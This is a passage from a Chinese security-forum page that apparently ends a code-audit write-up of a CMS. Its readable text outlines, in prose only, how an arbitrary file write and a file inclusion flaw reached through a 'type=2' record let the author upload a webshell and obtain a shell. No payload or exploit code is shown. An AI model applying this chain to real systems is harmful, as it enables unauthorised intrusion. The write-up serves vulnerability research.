6gsv8PKL+/n0L/8c8/OTnD57jq1bt3D2yGGeP3qcn3nkY/zNX/4Fx6/meeSnPsLU1X6+89SzzMx/hMLkeZ54+iW237KX1vwMc6UkibjAi8chlWB0aoiv/t23eOC+++lbdSvfefxbTIpmWmoSPPatR7kyUebWzWs5c/I0E+NTBIHP1778BfbsfYh3v/N+Th55lS989dv89j//p+zcvplX9z3HrXs2UZtMIKVBBYZS2ccYjYwlcHCQGJSfZ3pqktlcDo1mPj9PYX6O3OwsxtEIaTdLpUKemrRH+YaL7oqsyIq82eLejJXLhJPSoJg2OWaCaZTwK9+aCiB3cfCIixi1TpKkSSGXzGnrggwt4KG53AEWWberpHKqFAhjFsD3a6yvN5bIerBwzzdi7bvm6is6bEVWZJFEGiKdSdHUVM+pM2dY1ddIZ1c3J48dBOKUi2WUUBgtaG5p5vbbb2dsepLLowMka7KsXbOBTE2SfH4eV8aIx5NvTtukBdVgaWp+oMiVDAKFMpJc2aC0RiHIlxVzJR9hBHEFOinxPI9dO7Zw/Px5Tp44TXkqix/AQw9/mJmRC7z06nG+/PkvcO7oYcYnJ4m7rt2wC4VwQohoDImaWt71vvfzk/fv5p7tzfz6v/6fnL94Fa0CHAmDV86x7+BhPv3P/0/u2LqG2MwZXv3t/5dTp84w2/88biLLz/2TX6EjBSo/ydj5Q5Tnpvibv/5LWlvb+KVf+VXqUi6+X8ZVmvz8NDIeYx5D//kB/tmv/SbjZ89xtn+A
|
|||
|
|
然后我们再通过创建的id命令执行上传木马即可,返回包如图说明上传成功<br>
|
|||
|
|
<a id=img5 href=https://xzfile.aliyuncs.com/media/upload/picture/20241012110639-fff39660-8846-1.png><img src=data:image/png;base64,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
|
|||
|
|
至此成功拿到shell<br>
|
|||
|
|
<a id=img6 href=https://xzfile.aliyuncs.com/media/upload/picture/20241012110708-1122a322-8847-1.png><img src="data:image/png;base64,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
|
|||
|
|
<h1 id=toc-14>总结</h1>
|
|||
|
|
<p>总的来说这次审计过程比较有意思,首先发现任意文件写入和文件包含漏洞,需要进入<code>type=2</code>分支,其实当时看到这里就打算放弃这个点了,但是不死心,后来通过观察,只需要通过<code>add</code>函数添加<code>type=2</code>去实现我们下一步上传等执行命令,整个过程很坎坷,审计也很考验耐心,目前我还需要不断努力,不断学习,效率还是不够高,同时欢迎各位大佬能够一起交流审计的小技巧,让小弟也多积累一些审计的经验,谢谢各位观看,向各位学习!</p>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
<div class=post-user-action style=margin-top:34px>
|
|||
|
|
<span class="btn btn-default pull-right" id=mark data-action=topic data-pk=15830>
|
|||
|
|
<span id=mark-text>点击收藏 </span><span class=i-seprator> | </span><span id=mark-count>0</span>
|
|||
|
|
</span>
|
|||
|
|
|
|||
|
|
<span class="btn btn-default pull-right" id=follow_topic data-pk=15830>
|
|||
|
|
<span>关注</span><span class=i-seprator> | </span><span id=follow-count>1</span>
|
|||
|
|
</span>
|
|||
|
|
|
|||
|
|
|
|||
|
|
<span class="btn btn-default pull-right">
|
|||
|
|
<span>
|
|||
|
|
|
|||
|
|
<span id=ready_reward data-toggle=modal data-target=#myModal>打赏</span>
|
|||
|
|
|
|||
|
|
</span>
|
|||
|
|
</span>
|
|||
|
|
|
|||
|
|
<div class=clearfix></div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
<div class=related-section>
|
|||
|
|
<div class=related-box>
|
|||
|
|
|
|||
|
|
<span><a class=pull-left href=https://xz.aliyun.com/t/15761 title="Apache Airflow XSS fuzzing之旅"><span class=related-label style="padding:3px 4px;margin-right:3px">上一篇:</span>Apache Airflow XS...</a></span>
|
|||
|
|
|
|||
|
|
|
|||
|
|
<span><a class=pull-left href=https://xz.aliyun.com/t/15832 title=记一次某CMS反序列化任意文件删除的审计过程><span class=related-label>下一篇:</span>记一次某CMS反序列化任意文件删除...</a></span>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
<div class="modal fade" id=myModal role=dialog aria-labelledby=myModalLabel aria-hidden=true>
|
|||
|
|
<div class=modal-dialog>
|
|||
|
|
<div class=modal-content>
|
|||
|
|
<div class=modal-header>
|
|||
|
|
<h4 class=modal-title id=myModalLabel style=text-align:center>
|
|||
|
|
积分打赏
|
|||
|
|
</h4>
|
|||
|
|
</div>
|
|||
|
|
<div class=modal-body id=button-value>
|
|||
|
|
<div style=text-align:center>
|
|||
|
|
<div role=group>
|
|||
|
|
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type1>
|
|||
|
|
1分
|
|||
|
|
</button>
|
|||
|
|
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type2>
|
|||
|
|
2分
|
|||
|
|
</button>
|
|||
|
|
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type3>
|
|||
|
|
5分
|
|||
|
|
</button>
|
|||
|
|
</div>
|
|||
|
|
<br>
|
|||
|
|
<div style=margin-top:20px>
|
|||
|
|
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type4>
|
|||
|
|
8分
|
|||
|
|
</button>
|
|||
|
|
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type5>
|
|||
|
|
10分
|
|||
|
|
</button>
|
|||
|
|
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type6>
|
|||
|
|
20分
|
|||
|
|
</button>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
<div class=modal-footer id=confirm>
|
|||
|
|
<button type=button class="btn btn-default" data-dismiss=modal>关闭</button>
|
|||
|
|
<button type=button class="btn btn-primary" id=reward_topic data-pk=15830>确定</button>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
|
|||
|
|
<div class="row box">
|
|||
|
|
<ol class=breadcrumb>
|
|||
|
|
<li class=active>0 条回复</li>
|
|||
|
|
</ol>
|
|||
|
|
<div class="box-container post-container">
|
|||
|
|
|
|||
|
|
<ul>
|
|||
|
|
<li style=min-height:50px;line-height:60px;margin-left:15px><strong>动动手指,沙发就是你的了!</strong></li>
|
|||
|
|
</ul>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
|
|||
|
|
<div class="row box" id=reply-box>
|
|||
|
|
|
|||
|
|
<div class="box-container clearfix">
|
|||
|
|
|
|||
|
|
<div class=reminder>
|
|||
|
|
<a href="https://account.aliyun.com/login/login.htm?oauth_callback=https%3A%2F%2Fxz.aliyun.com%2Ft%2F15830&from_type=xianzhi"><strong>登录</strong></a> 后跟帖
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
<footer class=bs-docs-footer>
|
|||
|
|
<div class="container text-center">
|
|||
|
|
<div class=links>
|
|||
|
|
<a href=https://xz.aliyun.com/feed target=_blank>RSS</a>
|
|||
|
|
<a href=https://xz.aliyun.com/about target=_blank><span>关于社区</span></a>
|
|||
|
|
<a href=https://xz.aliyun.com/partner target=_blank><span>友情链接</span></a>
|
|||
|
|
<a href=https://xz.aliyun.com/notice>社区小黑板</a>
|
|||
|
|
<a href=https://xz.aliyun.com/connection>联系我们</a>
|
|||
|
|
<a href=https://report.aliyun.com/ target=_blank>举报中心</a>
|
|||
|
|
<a href=https://www.aliyun.com/complaint target=_blank>我要投诉</a>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</footer>
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
<div id=waf_nc_block style=display:none></div><div id=immersive-translate-popup style=all:initial><template shadowrootmode=open><style class=sf-hidden>/*!
|
|||
|
|
* Pico.css v1.5.6 (https://picocss.com)
|
|||
|
|
* Copyright 2019-2022 - Licensed under MIT
|
|||
|
|
*/#mount{--font-family:system-ui,-apple-system,"Segoe UI","Roboto","Ubuntu","Cantarell","Noto Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--line-height:1.5;--font-weight:400;--font-size:16px;--border-radius:0.25rem;--border-width:1px;--outline-width:3px;--spacing:1rem;--typography-spacing-vertical:1.5rem;--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing);--grid-spacing-vertical:0;--grid-spacing-horizontal:var(--spacing);--form-element-spacing-vertical:0.75rem;--form-element-spacing-horizontal:1rem;--nav-element-spacing-vertical:1rem;--nav-element-spacing-horizontal:0.5rem;--nav-link-spacing-vertical:0.5rem;--nav-link-spacing-horizontal:0.5rem;--form-label-font-weight:var(--font-weight);--transition:0.2s ease-in-out;--modal-overlay-backdrop-filter:blur(0.25rem)}@media (min-width:576px){#mount{--font-size:17px}}@media (min-width:768px){#mount{--font-size:18px}}@media (min-width:992px){#mount{--font-size:19px}}@media (min-width:1200px){#mount{--font-size:20px}}@media (min-width:576px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*2.5)}}@media (min-width:768px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3)}}@media (min-width:992px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3.5)}}@media (min-width:1200px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*4)}}@media (min-width:576px){article{--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media (min-width:768px){article{--block-spacing-horizontal:calc(var(--spacing)*1.5)}}@media (min-width:992px){article{--block-spacing-horizontal:calc(var(--spacing)*1.75)}}@media (min-width:1200px){article{--block-spacing-horizontal:calc(var(--spacing)*2)}}dialog>article{--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing)}@media (min-width:576px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*2.5);--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media (min-width:768px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*3);--block-spacing-horizontal:calc(var(--spacing)*1.5)}}a{--text-decoration:none}a.secondary,a.contrast{--text-decoration:underline}small{--font-size:0.875em}h1,h2,h3,h4,h5,h6{--font-weight:700}h1{--font-size:2rem;--typography-spacing-vertical:3rem}h2{--font-size:1.75rem;--typography-spacing-vertical:2.625rem}h3{--font-size:1.5rem;--typography-spacing-vertical:2.25rem}h4{--font-size:1.25rem;--typography-spacing-vertical:1.874rem}h5{--font-size:1.125rem;--typography-spacing-vertical:1.6875rem}[type="checkbox"],[type="radio"]{--border-width:2px}[type="checkbox"][role="switch"]{--border-width:3px}thead th,thead td,tfoot th,tfoot td{--border-width:3px}:not(thead,tfoot)>*>td{--font-size:0.875em}pre,code,kbd,samp{--font-family:"Menlo","Consolas","Roboto Mono","Ubuntu Monospace","Noto Mono","Oxygen Mono","Liberation Mono",monospace,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji"}kbd{--font-weight:bolder}[data-theme="light"],#mount:not([data-theme="dark"]){--background-color:#fff;--background-light-green:#F5F7F9;--color:hsl(205deg,20%,32%);--h1-color:hsl(205deg,30%,15%);--h2-color:#24333e;--h3-color:hsl(205deg,25%,23%);--h4-color:#374956;--h5-color:hsl(205deg,20%,32%);--h6-color:#4d606d;--muted-color:hsl(205deg,10%,50%);--muted-border-color:hsl(205deg,20%,94%);--primary:hsl(195deg,85%,41%);--primary-hover:hsl(195deg,90%,32%);--primary-focus:rgba(16,149,193,0.125);--primary-inverse:#fff;--secondary:hsl(205deg,15%,41%);--secondary-hover:hsl(205deg,20%,32%);--secondary-focus:rgba(89,107,120,0.125);--secondary-inverse:#fff;--contrast:hsl(205deg,30%,15%);--contrast-hover:#000;--contrast-focus:rgba(89,107,120,0.125);--contrast-inverse:#fff;--mark-background-color:#fff2ca;--mark-color:#543a26;--ins-color:#388e3c;--del-color:#c62828;--blockquote-border-color:var(--muted-border-color);--blockquote-footer-color:var(--muted-c
|